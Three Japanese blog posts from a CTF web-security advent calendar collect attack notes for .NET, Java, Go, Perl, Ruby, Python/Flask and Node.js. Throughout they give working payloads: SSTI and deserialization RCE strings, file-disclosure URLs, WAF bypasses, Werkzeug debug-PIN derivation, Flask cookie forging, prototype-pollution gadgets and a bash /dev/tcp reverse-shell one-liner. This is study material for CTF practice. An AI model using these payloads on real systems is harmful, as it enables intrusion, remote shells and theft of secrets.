2021-12-20

CTFのWebセキュリティにおけるその他言語まとめ（C#, .NET, GO, Java, Perl, Ruby）

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の20日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

ASP.NET

要求の検証-スクリプト攻撃の防止 | Microsoft Docs
- ASP.NETでは怪しいリクエストはブロックしてくれる機能が備わっている
- ブロックされたもの <s>, &#
Web.config
- httpCookies
  - HttpOnlyCookies: trueならHttpOnlyつける。defaultはfalse
  - RequireSSL: trueならsecureをつける。defaultはfalse
  - SameSite: defaultは.NET Framework 4.7.2以降ならLax、それより前はNone
Value Shadowing、Requestの罠
- Request["param1"]とデータを取得すると、QueryString, Form, Cookies, ServerVariablesの順でparam1に対応するものを取ってくる
  - なので、GETパラメタを想定しているものはギリギリセーフで、他はアウト
- 作問ネタ
  - バリデーションではRequest["userid"]でやってるけど、処理はCookie["userid"]でやっていたら、QueryStringに安全なやつを入れておいて、Cookieに攻撃コードを入れておけば攻撃できる
  - バリデーションではどこでuseridが来てもバリデーションされるようにRequestを使っていたとすればいい
- つまり実装想定ではCookieからであってもGET Parameterを入れると、そちらを採用してしまう
- なお、これはASP.NET Coreではこの機能は消されているので安全になっている
aspx
- 出力について
  - <%= 出力文字列 %>とやるとそのまま出力するのでXSS成立
  - <%: 出力文字列 %>とやるとhtmlエンコードしてくれる
- Headerについて
  - Content-sniffing対策として、然るべきContent-Typeはつけておくこと
    - 無い場合はapplication/octet-stream
  - HttpResponseでのヘッダー追加
    - EnableHeaderChecking=true（かつ、デフォルトはtrue）ならHeader injectionについては問題ない
    - HttpResponseでAddHeaderとAppendHeaderとあるが、どっち使っても一緒
      - AddHeaderは下位互換で存在してるだけっぽいので、AppendHeaderを使っておけばいいみたい
- webshell webshell/cmd.aspx at master · tennc/webshell
ashx
- HttpCombiner ASP.NET - Remote File Disclosure - ASP webapps Exploit
  - http://[host]/css/HttpCombiner.ashx?s=~/web.config&t=text/xml
- Cute Editor ASP.NET - Remote File Disclosure - ASP webapps Exploit
  - http://www.site.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
Blazor
- 出力について
  - ok @[userinput]
  - ng @Html.Raw([input])
テク
- IIS/ASPではURLに%単体が入っている場合は無視するという仕様がある
  - DEC%LAREとすればDECLAREと認識されて、IDS/WAFをbypassできる
- 設定ファイルが誤って公開されてないか web.config
- IIS - Internet Information Services - HackTricks
  - /trace.axdにアクセスすれば設定によっては色々見れる
- ViewStateジェネレータ
  - 0xacb/viewgen: viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- Unsafe ViewState Deserializationがあるっぽい
  - Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - NotSoSecure
- GodFather OrwaさんはTwitterを使っています「#bugbountytip #bugbountytips Check these end all the time Target/elmah.axd? You can found info like Session cookies Session state Query string and post variables IP addresses which potentially leads to account takeover of all the account who makes a request to the target https://t.co/jHikiTVc1r」 / Twitter
  - axdは怪しい？ /elmah.axd?でログが見られた？

Csharp

サニタイズ絡み
- エスケープ関数一覧
  - HttpUtility.HtmlEncode
  - HttpUtility.HtmlAttributeEncode
- URL Get parameter系
  - 単純にはUri.EscapeDataStringを使う
    - Url.EscapeUriStringというのもあるが、こっちは使ってはいけない
    - ref: .net - What's the difference between EscapeUriString and EscapeDataString? - Stack Overflow
  - C# クエリストリング(?var=hoge&...)を作る - け日記
    - 本当はここにあるようにURLをクラスで作ってもらうのが理想
    - Query系は自分で作らないの鉄則
LINQ
- LINQ使っとけばSQLi系はとりあえず安全（構文壊す系は）
- LINQPadを使えば、コードからLINQ内部で使われているSQL文を表示させることができる
Unsafe Deserialization
- https://www.nccgroup.com/globalassets/our-research/uk/images/whitepaper-new.pdf

.NET

Unsafe Deserialization
- JSONとかXMLとかデシリアライズする時の危険性の話。.NETだと固有なことがある？
- 資料
- tools
  - pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
- writeups
  - WhoAmI

Go言語

curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag
- http.HandleFunc("/flag", func(w http.ResponseWriter, r *http.Request) {
- こういう感じに/flagのアクセスについては制限がかかっていたときに、以上でバイパスできる
- これはCONNECTメソッドでの呼び出し時にはpath canonicalizationをやらないためである
脆弱性
- net/http: FileServer incorrectly parses Range header when a range starts with two minus signs · Issue #40940 · golang/go · GitHub
static analysis
- セキュアにGoを書くための「ガードレール」を置こう - 安全なGoプロダクト開発に向けた持続可能なアプローチ - Flatt Security Blog

Java

Expression Languages
- SPEL expression
  - RCEできる"test".length()を試してみよう。うまくいけば4がでてくる
  - CTFtime.org / De1CTF 2020 / calc / Writeup
- JEXL Injection
  - Detecting JEXL injections with CodeQL | The blog of a gypsy engineer
RCE "a".class.forName("java.la"+"ng.Ru"+"ntime")で実質java.lang.Runtimeと使える。
output a file java.nio.file.Files.readAllLines(java.nio.file.Paths.get("/flag"))
- %27sam%27.class.forName(%27java.nio.file.Files%27).readAllLines(%27sam%27.class.forName(%27java.nio.file.Paths%27).get(%27/flag%27))
RASP: Runtime Application Self Protection
- これがあると、コードインジェクションを防衛するみたい。（Tomcatとか）
new java.io.BufferedReader(new java.io.InputStreamReader(T(java.lang.Runtime).getRuntime().exec('ls').getInputStream())).readLine()
- 服务端模板注入攻击(SSTI)学习 | 3ND's Blog
'a'.concat('b')
- フィルタ回避の文字列分割はconcatが便利かも
Javaでファイル取ってくるとき java.nio.file.Files.readAllLines(java.nio.file.Paths.get("/flag.txt"))
Tomcat Version 9.0.24
- GhostCatという名前のCVE-2020-1938
- 00theway/Ghostcat-CNVD-2020-10487: Ghostcat read file/code execute,CNVD-2020-10487(CVE-2020-1938)
  - これがすごい便利
- ファイル構成(Standard Directory Layout) → Application Developer's Guide (9.0.33) - Deployment
- javaのclassファイルを取ってきてデコンパイルして、中身を確認する
  - python ajpShooter.py http://netcorp.q.2020.volgactf.ru:7782 8009 /WEB-INF/classes/ru/volgactf/netcorp/ServeComplaintServlet.class read -o complaint.class
  - jad -s java *class

Thymeleaf

テンプレートエンジン。SSTIできるかも。

使えそうな情報
- Tutorial: Thymeleaf + Spring
  - Use Spring Expression Language (Spring EL) as a variable expression language, instead of OGNL. Consequently, all ${...} and *{...} expressions will be evaluated by Spring’s Expression Language engine.
  - SPELで使える攻撃が使える
便利な記法 CTFtime.org / SharkyCTF / WebFugu
- 全部の変数情報取得 html <tr th:each="var : ${#vars.getVariableNames()}"> <td th:text="${var}"></td> <td th:text="${#vars.getVariable(var)}"></td> </tr>
- フィールドの確認 html <tr th:each="var : ${flag.class.declaredFields}"> <td th:text="${var.name}"></td> <td th:text="${var}"></td> </tr>
- メソッドの確認 html <tr th:each="var : ${flag.class.getMethods()}"> <td th:text="${var.name}"></td> <td th:text="${var}"></td> </tr>
- メソッド実行結果の確認 html <td th:text="${flag.getContent()}"></td>

Java EEのWAR形式

Java EEで開発されたWebアプリケーションを一つのファイルにパッケージする標準形式の一つ。 zipなので、zipにして解凍すればいい。一回解凍してみたら、以下のような感じになっていた。多分、META-INF, WEB-INFは固定であって、それ以外が普通のWebリソース？

root
- META-INF
- WEB-INF
  - web.xmlっていうマニフェストファイルがある
    - ここのservlet-mappingのurl-poatternが接続先
- index.html

Unsafe Java Object Deserialization

.NETのときと同様にgadget chainしてコード実行に持ち込む
- GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Java Deserialization — From Discovery to Reverse Shell on Limited Environments | by Francesco Soncina (phra) | ABN AMRO — Red Team | Medium
- change Runtime exec(String) to exec(String[]) · Issue #71 · frohoff/ysoserial · GitHub
- code white | Blog: $@|sh – Or: Getting a shell environment from Runtime.exec
Javaの安全でないデシリアライゼーションの攻撃に、ysoserialがよく使用される https://github.com/frohoff/ysoserial
- ysoserialをforkしてpayloadを追加するなど機能拡張しているリポジトリが公開されている（特にTomcatにメモリWebShellを設置する機能追加が多い）
  - Tomcatのセミユニバーサルエコー方式
    - 解説記事：https://xz.aliyun.com/t/7348
    - リポジトリ：https://github.com/kingkaki/ysoserial
  - グローバルストレージに基づく新しいアイデア|一般的なエコー方式に関するTomcatの調査
    - 解説記事：https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247484799&idx=1&sn=42e7807d6ea0d8917b45e8aa2e4dba44
    - リポジトリ：https://github.com/Litch1-v/ysoserial
  - TomcatベースのメモリWebshellファイルレス攻撃テクノロジー
    - 解説記事：https://xz.aliyun.com/t/7388
    - リポジトリ：https://github.com/threedr3am/ysoserial
  - CommonsBeanutilsとcommons-collectionsを使用しないShiroの逆シリアル化の利用
    - https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
    - https://github.com/phith0n/JavaThings

J2EE / Spring

セッション
- JSESSIONIDって名前でCookie発行されてセッションIDが付与される
Spring Boot のデフォルトの状態では、404 Not Found 等が発生した際に Whitelabel Error Page というエラーページが表示される。

解析

jarファイルとかclassファイルをデコンパイルして解析してみる
jd-gui
- apt-get install jd-guiでインストールしてjd-guiで起動するだけ
- jar,classをD&Dすれば中身が見られる

テク

web.xmlが公開状態になっていないか
writeups
- CTFtime.org / redpwnCTF 2021 / Requester
  - あんま読んでないんだけど・・・
UUID.randomUUID()は暗号学的にも安全なUnique IDが得られる

Perl

Perl難読化

ksnctf 25 Reserved 30pt - Qiita
- 予約語だけを使った難読化がある

PerlのopenにはRCE脆弱性がある

https://www.ipa.go.jp/security/awareness/vendor/programmingv1/a04_01.html

|lsみたいなファイルパスを入れると|以降が実行されて結果が返ってくる

Ruby

テク
- Dir.globは%00で区切ればOR検索になる p Dir.glob("f*\0b*") # => ["foo", "bar"]
  - SECCON 2019 Online CTF Writeup - Web - こんとろーるしーこんとろーるぶい
footprint
- 以下のようなタグが入ってればrailsのCSRF対策かも
  - railsのCSRF対策について - Qiita
  - <meta name="csrf-param" content="authenticity_token" />
  - <meta name="csrf-token" content="vtaJFQ38doX0b7wQpp0G3H7aUk9HZQni3jHET4yS8nSJRt85Tr6oH7nroQc01dM+C/dlDwt5xPff5LwyZcggeg==" />
  - トークンはセッションに入るらしいので、どこかから抜き出す以外は難しい
Gem.lockから脆弱性を洗い出す
- Facets — Scan Gemfile for Security Issues — Hakiri
Deserialization
- Deserialization on Rails

2021-12-19

CTFのWebセキュリティにおけるPythonまとめ

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の19日目の記事です。

使えるコマンド例
- cat open('/flag').read()
- pwd getcwd()
- RCE __import__('os').popen('COMMAND').read() __import__("os").system("ls")
- pythonでは;区切りするとワンライナーで書ける。import subprocess;out=subprocess.Popen("[cmd]", shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT);stdout,stderr=out.communicate();print(stdout);
- 参考
  - Python sandbox escape - CTF Wiki
Python 3.7.2にはUnicode正規化を利用したホスト偽装方法がある
- 課題 36216: CVE-2019-9636: urlsplit does not handle NFKC normalization - Python tracker
- https://example.com\uFF03@bing.com → https://example.comにアクセスされるがbing.comがホスト名になる
formatを利用したSSTI
- 例えばfmt_cmt = cmt.comment.format(rating=self.__dict__)というコードがあって、cmt.commentに外部からなんでも入力が入れられるとする
- この時、{rating}を入力すると、self.dictの値が出力されてしまう。formatで{rating}が変換されるためである。
- まあ、これだけならいいのだが、もっと情報を抜き出すこともできる。
  - Be Careful with Python's New-Style String Format | Armin Ronacher's Thoughts and Writings
- {rating[comments][0].__class__.__init__.__globals__}こういうペイロードもある。
  - とにかくinitが使える部分を探すのがミソか。
- lovasoa/pyformat-challenge: Python format string vulnerability exploitation challenge
  - なんか見つけた。中身見てないし、関係ないかも。
- Exploiting Python’s Eval | floyd's
  - 類題？
- python - globals in imported function is much different than globals of function in main module - Stack Overflow
  - これを見るとどうやらglobalsメソッドは関数についてくるらしい
  - だからinitに対してglobalsを呼んでいるのか
- Formatting a.__init__.__globals__[flag]
fstringを使ったRCE
- fstring(input)としている場合は{open('/flag').read()}みたいなインジェクションがいける
urlparse
- pythonのurlparseの仕様をうまく使えば、色々バイパスできる
- メモ
os.path.join is weird in python3
- Flask - When to use send_file / send_from_directory - Stack Overflow
  - ルート指定でpathが付いていれば、パスを与えることができる
    - （そうでないなら、パスはURL的に処理されてしまう）
  - send_fileであれば、相対パスを与えることができる（ディレクトリトラバーサル可能）
  - send_from_driectoryであれば、無理
- python3のjoinはこんな挙動をするので、ディレクトリトラバーサルに使える。

 >>> import os
 >>> print(os.path.join('/home', 'flag.txt'))
 /home/flag.txt
 >>> print(os.path.join('/home', '/flag.txt'))
 /flag.txt

subprocessはコマンドインジェクションができてしまう
- 特にshell=Trueとなってたら危ない
- subprocess --- サブプロセス管理 — Python 3.8.5 ドキュメント
  - shell=Trueを付けない、デフォルトの状態だと安全に渡される
  - 例えばcat flagを与えると、スペースがエスケープされて全体で1コマンド解釈されるので、shell=Trueを付けたりする
  - でも['cat', 'flag']を与えることで、shall=Trueが無くても正しく実行してくれる（しかも空白を制限できるのでやや安全）
cookieを使ってバイパス
- CTFtime.org / DefCamp CTF 2020 Online / http-for-pros / Writeup
- request.cookies['a']みたいにして、aをcookieに入れてやればいい
- {{request[request.cookies['a']][request.cookies['b']][request.cookies['c']][request.cookies['d']][request.cookies['e']][request.cookies['f']]('subprocess')[request.cookies['g']](request.cookies['h'],shell=True)}}として -"a": "__class__","b": "_get_file_stream","c": "im_func","d": "func_globals","e": "__builtins__","f": "__import__","g": "check_output","h": cmdという感じ
re.sub(r'([^_\.\sa-zA-Z0-9])', r'\\\1', s)
- とやると\nは変換されない
脆弱性
- picoCTF 2021 What's your input? - Qiita
  - 変数名を入れるとそのまま展開されて表示されるバグ
文字列しか扱えないとき
- f"{__builtins__['__import__']('os').__dict__['popen']('ls').read()}"みたいにf"{}"で囲んで文字列化
プライベート変数を参照したいとき
- Pythonのプライベート変数の振る舞いについて - Qiita
- _{クラス名}{プライベート変数名}で直接参照ができる。
__dict__でインスタンスの変数が参照可能 instance.__dict__['private_var_name'] = 'private_var_value';
メモリを改ざんすることで数値をいじるテク
- pythonでは全てがオブジェクトとして管理されており、数値もオブジェクトとしてメモリに実質的な値が格納されている。よって、メモリをいじることで数値の評価値を変えることができる
- Python - Pythonのid関数は一体何を指しているのか？｜teratail
  - id関数でメモリの場所が抜けるが、色々実装依存の所があるっぽい
- 🔰 SECCON Beginners CTF 2021 作問者 Writeup - Qiita
  - 要求としては42の数値を書き換えたい
  - 数値42の先頭アドレスを取得する id(42)とするのが理想だがこの問題では5文字までの制限があるのでid(1)として41 * 32を足すことでid(42)を求めている
  - 1のアドレス+24からが数値の中身を管理する領域なのでここまでseekして書き換える
  - 問題ではHackを書き込むので、これが32bit整数として評価されるので42はかなりでかい数値として評価される事になってフラグを得る
pythonのcodingをraw_unicode_escapeを使って、コメント部分を実行させるテク
- CTFtime.org / THC CTF 2021 / TheHiddenOne
文字種が限定されている場合のRCE
- https://codegolf.stackexchange.com/a/178973
- https://www.reddit.com/r/LiveOverflow/comments/97b0hw/help_python_code_execution_without_letters/
  - これは？
メモ
- type(int("1_1")) = <class 'int'>でint("1_1")=11となる
pdb.post_mortem(e.__traceback__)みたいなコードがあれば、ここに到達すればPDBが起動する。
- そうすれば、任意のpythonコードをインタラクティブに実行可能
- import osして、os.system("[RCE]")すればいい
pycを解析する
- uncompyle6 · PyPI
  - $ uncompyle6 parseltounge.pycとすれば普通にデコンパイルされる

ライブラリ

Flask,Twig
- HackTricks
- python向けのウェブアプリケーションフレームワーク
- セッションの形式が特殊でわかりやすい
- {{ config.items() }}とやることで、いろんな情報を表示できる {{config}}でも抜ける
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
- secure_filenameは強い。
- debug modeの場合は/consoleが怪しい
  - consoleにPINコードがかかっているときの解析方法。LFIができれば解析可能
  - Workerbee Walkthrough (Werkzeug Debug Pin generation) - YouTube
    - werkzeug - HackTricks
      - ここの末尾にPINコードを作成するpythonコードが添付されているのでこれを埋めるようにして、情報をかき集めていく
    - probably_public_bitsを埋める
      - 1番目
        
        /proc/self/environから環境変数USERを取ってくるUSER=loremipsum
      - 2番目はそのまま
      - 3番目
        
        /proc/self/cmdlineをするとloremipsum.pyというファイル名だと分かる
        
        loremipsum.pyを取ってくるとapp = Flask(__name__)とあるので、ここはこのままFlaskでよい
      - 4番目
        
        エラー画面を見ると/usr/local/lib/python3.6/dist-packages/flask/app.pyとあるので、python3.6に修正する
    - private_bits
      - 1番目
        
        /proc/net/arpを見るとDeviceはeth0であると分かる。
        
        /sys/class/net/eth0/addressとしてMACアドレスを取得する02:42:ac:1b:00:02
        
        これを16進数でつないで10進数に変換すると得られる print(0x0242ac1b0002)=2485378547714
      - 2番目
        
        以下2つをそのままつなげたものを入れる
        
        /proc/sys/kernel/random/boot_idでb875f129-5ae6-4ab1-90c0-ae07a6134578が得られる
        
        /proc/self/cgroupの最初の要素のハッシュ値みたいなやつを取ってくる
        
        11:memory:/docker/e8c9f0084a3b2b724e4f2a526d60bf0a62505f38649743b8522a8c005b8334aeのe8c9f0084a3b2b724e4f2a526d60bf0a62505f38649743b8522a8c005b8334ae
        
        よって、b875f129-5ae6-4ab1-90c0-ae07a6134578e8c9f0084a3b2b724e4f2a526d60bf0a62505f38649743b8522a8c005b8334ae
    - これで実行するとPINコード126-739-410が得られて、使えば答え
- Flaskのセッション管理
  - format
    - [sessiondata].[Timestamp].[signature]
    - Baking Flask cookies with your secrets | by Luke Paris | Paradoxis
    - jwtっぽいけど、違う
  - Cookieにセッションの内容が全部入っている。secret_keyがあれば署名も可能
    - Cookieにセッションの内容がすべて入っている（スレートレス）状態になっているため、ログアウトしてCookieを削除しても、それを予めとっておいて再送すればログイン中のセッションとして使用できる
    - つまり、ログアウトの目的の1つである、古いセッションを削除して、dropcatchされても問題ないようにするという解決法が意味をなさない
      - 緩和策としてセッションの寿命を短くしておくことが挙げられる
  - sstiできるなら、configからsecret_keyを抜き出すことも可能
  - flask_jwtを使うことでjwtが使える
  - Tools
    - GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder
    - flask-unsignツールを使うと簡単にブルートフォースで解析可能
      - インストール pip install flask-unsign flask-unsign[wordlist]
      - 中身見る flask-unsign -d -c "[cookie]"
      - パスワード解析 flask-unsign -c "[cookie]" --unsign
      - 作り直す flask-unsign --sign --secret password1 --cookie "{'flagship': True, 'username': 'toto'}"
    - 辞書攻撃が効く問題も見たことがある
      - rockyou.txtで解析したいとき flask-unsign -c "[cookie]" --unsign --wordlist tools/rockyou.txt --no-literal-eval
- send_fileするときにMIMEタイプが設定されていない場合は、拡張子からMIMEタイプが推論されて付与される
flask_admin
- クラスでモデルを作ってDB編集を簡単に行えるようにしたフレームワーク
  - from flask_admin import Adminみたいにインポートしてる
- これを使えば以下ルールでDBをいじれる
  - /admin/[Table名]/ Table内容を確認する
  - /admin/[Table名]/edit/?id=XX id=XXである要素を編集できる
  - /admin/[Table名]/new Tableに新しい要素を追加する
- 問題
  - CTFtime.org / VolgaCTF 2021 Qualifier / flask-admin
Flaskのwerkzeugで使われるパスワードハッシュ
- from werkzeug.security import generate_password_hashで使われるパスワードハッシュ
- pbkdf2:sha256:150000$ODedbYPS$4d1bd12adb1eb63f78e49873cbfc731e35af178cb9eb6b8b62c09dcf8db76670こんなかんじ
jinja
- RCE1
  - getパラメタを使ってうまくフィルターを回避する例
  - URL/apply?x=__class__&l=os
  - データ{{(config|attr(request.args.x)|attr('__init__')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')(request.args.l)|attr('popen')('id')|attr('read')())}}
- RCE2
  - {{request.environ.__getitem__('gunicorn.socket').dup.__func__.__globals__.__getitem__('o''s').__builtins__.__getitem__('__import__')('subprocess').check_output(('bash','-c','cat strategyguide.txt'))}}
Tornade
- Tornade用のCookieの作り方
  - The Usual Suspects | csictf 2020
Pickle
- RCE脆弱性がある
- pickle.load(ここ！)に対してインジェクションできれば、発動させられる
- __reduce__メソッドはpickle.loadするときに発動して、文字列に入れ替わる
- lsを実行して、cat flagでフラグゲットパターンを見た
- not enough values to unpack (expected 3, got 2)というエラーはpickleっぽい
- flask_caching
  - キャッシュとしてpickleされたものが入ってる。なので、キャッシュポイズニングしたい場合はpickle.dumpsして先頭に!を入れてやればいい
  - flask_cache_view/メソッド名に入れればいい
  - 参考：CTF-Write-ups/CSAW Quals 2020/Web/flask_caching at master · csivitu/CTF-Write-ups
- 【Python】pickle（漬け物）は仮想マシンだった——仕組みとリスク - Qiita
weurkzerg
- デバッグモードが有効だと、エラー時に任意のpythonコードを実行できる
- /consoleでInteractive Console使えるかも
helpを使った変数表示
- flagという変数があって、help(flag)を動かすとNo Python documentation found for '[flagの中身]'というのが出力されてくる
  - b01lersCTF2021-pyjailgolf_1/README.md at main · Oceans77/b01lersCTF2021-pyjailgolf_1 · GitHub
- なんかinteractiveにも使えるっぽいhelp()ってしてそのあとflagを入れれる？

2021-12-18

CTFのWebセキュリティにおけるJavaScript,nodejsまとめ（Prototype pollution, 難読化）

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の18日目の記事です。

JavaScript / node.js

RCEワンライナー
- console.log(process.mainModule.require('child_process').execSync('ls -la').toString());
- 適当にコマンドインジェクションするとき
  - いろいろ&&コマンド;//いろいろみたいな感じにするといい。前半の色々はちゃんと実行できるように頑張ること
- リバースシェル
  - require("child_process").exec("bash -i >& /dev/tcp/[IPAddress]/[Port] 0>&1");process.exit();
x = ~~x;としてあると、xに文字列は使えず、整数しか使えない
encodeURIはエスケープとして不適切
- escape と encodeURI と encodeURIComponent を正しく使い分ける
- ここに説明があるが、encodeURIは&はエスケープされない
GET parameterは複数回指定することで上書き可能
- なるほど。今回は最後に入力したものが採用されるみたいだけど、確か実装依存。前調べたときのメモには以下のように書いてあった
- ?username=abc&username=efg
  - $_GET["username"] -> efg
  - new URL(location).searchParams.get("username") -> abc
document.writeでHTMLを書き込むと直後に再レンダリングしてくれる
- scriptタグがあれば実行もされる
途中にコメントを差し込んでも実行される
- alert(document/**/.domain);は実行される
- alert(docum/**/ent.domain);のようにキーワードをぶった切る場合は動かない
String.prototype.includes()
- 文字列のincludesは大文字小文字を区別する
- 'Blue Whale'.includes('blue') // returns false
innerHTMLとtextContent
- document.documentElement.innerHTML = 'input'はXSSに対して脆弱
  - ちなみにinnerHTMLはscriptタグを直接入れても即時実行されない
  - javascript - Can scripts be inserted with innerHTML? - Stack Overflow
- document.getElementById('body').textContent = 'input';は安全ここ
Spread operatorは他の引数をoverrideできる
- database.addData({ type: 'paste', ...req.body, uid });となっている場合、bodyにtypeがあると値をoverrideできる
- corCTF 2021 // Tom Plant
Cross-window communication
The clickjacking attack
- 参考になる資料
function () { ... }を短縮する
- アロー関数化する()=>{}
- 引数はずれてても大丈夫なので、x=>{}みたいに適当に与えればいい
.toString()するよりも+''としてキャストさせると短い
- +0でも文字列化できる（最低function時のときは）
文字列を適当に変換する [...str]+''
- str='abc' → [...str]={'a','b','c'} → [...str]+''='a,b,c'
arguments変数
- (function () { return () => arguments[0]})(() => {; /* ${FLAG} */ })()みたいに、無名関数で引数が与えられてなくてもarguments配列を使えば読める
即時関数で複数指定すると後半が実行される
- (function(){return"A";},function(){return"B";})()とするとBが帰る
bind関数
- functionに対してbind関数を使うと、thisに値を代替できる
- (function () { return String(this)[char_offset]}).bind(()=>{; /* ${FLAG} */ })()
  - thisに()=>{; /* ${FLAG} */ }が入る
URLのhashから実行コードをとってくる方法
- eval(decodeURIComponent(location.hash.slice(1)))とかいて、URL末尾に#[base64-encoded jscode]をつける
GitHub - cure53/H5SC: HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors
XSSのWriteup集
- Home · cure53/XSSChallengeWiki Wiki · GitHub
iframeのsrcdoc
- <iframe srcdoc="[html-tag]"></iframe>とすることでsrcdoc内部でHTMLのタグ、scriptタグが実行できる（XSSできる）
- これを使うとoriginを変更して実行できる？（よくわかってない）
改行 <CR>/<LF>/U+2028/U+2029
s = {"title":[userinput]}; title="title:"+s.title;の場合、[userinput]に{"toString":null}とやると、エラーを引き起こすことができる
window.locationまとめ例 https://example.com/admin?x=huge&y=piyo#hogehoge
- window.location.href = "https://example.com/admin?x=huge&y=piyo#hogehoge"
  - 全部
- window.location.protocol = "https:"
- window.location.host = "example.com"
  - 注意点。https://example.com:26/のようにポートが80じゃないならexample.com:26となる。なお、https://example.com:80/ならexample.com
- window.location.hostname = "example.com"
  - こっちはポートがあってもなくてもホスト名だけ
- window.location.port = 80
- window.location.search = "?x=fuga&y=piyo"
- window.location.hash = "#hogehoge"
- window.location.pathname = "/admin"
弱い比較
- ['admin'] == 'admin'がtrueであるが、['admin'] === 'admin'はfalse
nodejsでfsモジュールのreaddirを使えばls相当が可能
stringのreplaceは最初に見つけた1つ目しか変換されない
jsは配列もstringも同じような関数が使えるので、配列を与えてみるとうまくいったりする
- includesとかindexOfとかsliceとか
- 配列はstringに変換されると、['a','b','c']はa,b,cのようにコンマ結合される
Hoisting
- jsでは定義が実行より後ろであっても上手い事動くし、書き換えもできる
- function f() { console.log('pre'); } f(); function f() { console.log('post'); }を実行するとpostと出てくる
- これを利用して、コードの先頭でほぼ使われているrequireを上書きして、予期せぬタイミングで任意コードを実行するテクがあるここ
overrideされたスコープ外の要素を参照したい時
- ("global", eval)("this") - pirosikick's diary
  - こういった話。new Proxyを使って、スコープで使えるメソッドとかを限定してXSSを防ごうとするものがある
    - CTFtime.org / DiceCTF 2021 / Web IDE js const safeEval = (d) => (function (data) { with (new Proxy(window, { get: (t, p) => { if (p === 'console') return { log }; if (p === 'eval') return window.eval; return undefined; } })) { eval(data); } }).call(Object.create(null), d);
    - なんとかwindowインスタンスを得たいので、スコープ外のwindowを持ってきたい
    - const w = eval(this, "window"); w.fetch("https://evilman.requestcatcher.com/test", { method: "POST", body: "abcc" });
- vmライブラリ
  - vmとvm2ってのがあるみたい
  - Harekaze mini CTF 2020 で出題した問題の解説 - st98 の日記帳
    - this.constructor.constructor('return process')()
    - this.constructor.constructor('return process')().mainModule.require('child_process').execSync('[command]')
  - Sandboxing NodeJS is hard, here is why
関数をtoStringするとコメントも一緒に出力される
- JavaScript | 関数の定義内容をあらわす文字列を取得する(toString)
arguments.callee
- use strict下では使えないが、色々な関数にまつわる情報が抜ける
JavaScriptの RegExp オブジェクトは、global または sticky フラグが設定されている場合 (例えば /foo/g や /foo/y) はステートフルになります
- RegExp.prototype.exec() - JavaScript | MDN
- CakeCTF 2021 writeup - st98 の日記帳 - コピー
- そのため、let filter = /(\'|\\|\s)/g;というフィルタでfor (let name of neko_name) { if (filter.exec(name.toString()) === null) {こういう使われ方をしていると、neko_nameに同じ文字列を与えたとき、その文字列に対して先頭からフィルターにヒットするものを順番に返していって、末尾まで来たらnullとなり、フィルターを抜け出してしまう
innerTextを使うと自動でサニタイズされる
Webpack
- デバッグ時に利用するために、バンドル前のソースコードとバンドル後のソースコードの行の対応関係を保持している「ソースマップ」というファイルを出力することがあります。
  - 一般的にソースマップファイルはトランスパイル後のファイル名のあとに.mapを付与したファイル名になっています。
  - ここでは、main.jsのファイルのソースマップファイルがmain.js.mapに存在していることがアクセスをするとわかります。
パラメタを配列にしてうまくバイパスする
- https://example.com/page?path[]=x&path[]=index.phpこんな感じにすると、パスがx,idnex.phpと認識されたりする。
  - nodejsでは、配列を文字列解釈したときにカンマ結合するためである。
- このままだとうまく使えないので、結合時でもうまく動くように調整する
  - https://example.com/page?path[]=x&path[]=/../index.phpとすると、x,/../index.phpとなって、元のリクエストと同じになる。
AST Injection
- flatのバージョンを脆弱性のある5.0.0
- プロトタイプ汚染の脆弱性が存在する場合に、テンプレートエンジンがコードからAbstract syntax tree(抽象構文木)を組み立てる処理に介在して、 ASTを追加することで、任意の関数を実行する手法
- 参考
  - https://blog.p6.is/AST-Injection/
  - https://graneed.hatenablog.com/entry/2021/08/09/115452

プロトタイプ汚染攻撃 Prototype pollution attack

Prototype Poluttion Attack
- https://qiita.com/shellyln/items/af200a1953991de1698d
- jsのプロトタイプチェーンについては、以下が一番わかりやすかった。
  - 図で理解するJavaScriptのプロトタイプチェーン - Qiita ```
  - 指定したオブジェクトにプロパティが存在を調べる
  - なかった場合protoが参照する先で存在を調べる
  - それでもなかった場合protoが参照する・・・（ループ）
  - 最終的にnullになるまで行う。nullならundefinedを返す ```
- これでどっかのプロトタイプを汚染しておくことで、本来無いプロパティをインジェクションできるという話。
- 「環境が使い捨て+Node.js」でPrototype Pollutionっぽさがある
Gadget
- プロトタイプ汚染した状態で組み合わせると任意コード実行できたりXSSできたりするライブラリのこと。Gadget Chainという言葉もある。
- Node.jsでプロトタイプ汚染後に任意コード実行まで繋げた事例 - knqyf263's blog
  - 色々書いてある
- GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets
  - 一覧としてまとめられている
  - client-side-prototype-pollution/embedly.md at master · BlackFan/client-side-prototype-pollution · GitHub
    - 例えばここのPoCとか見るとわかりやすい。上のscriptでプロトタイプ汚染をして、scriptで呼び出すだけで実行される
    - ちなみに、Embedlyだと、__proto__.cssにURLを入れるとCSSとして読み込んでくれる
- Vue.jsでのGadget例
  - s1r1us - zer0ptsCTF2021-challenges
    - constructor[prototype][props][][value]=a&constructor[prototype][name]=":''.constructor.constructor('alert(1337)')(),"
    - constructor[prototype][v-if]=_c.constructor('alert(1337)')()
    - constructor[prototype][data]=a&constructor[prototype][template][nodeType]=a&constructor[prototype][template][innerHTML]="<script>alert(1337)<\/script>"
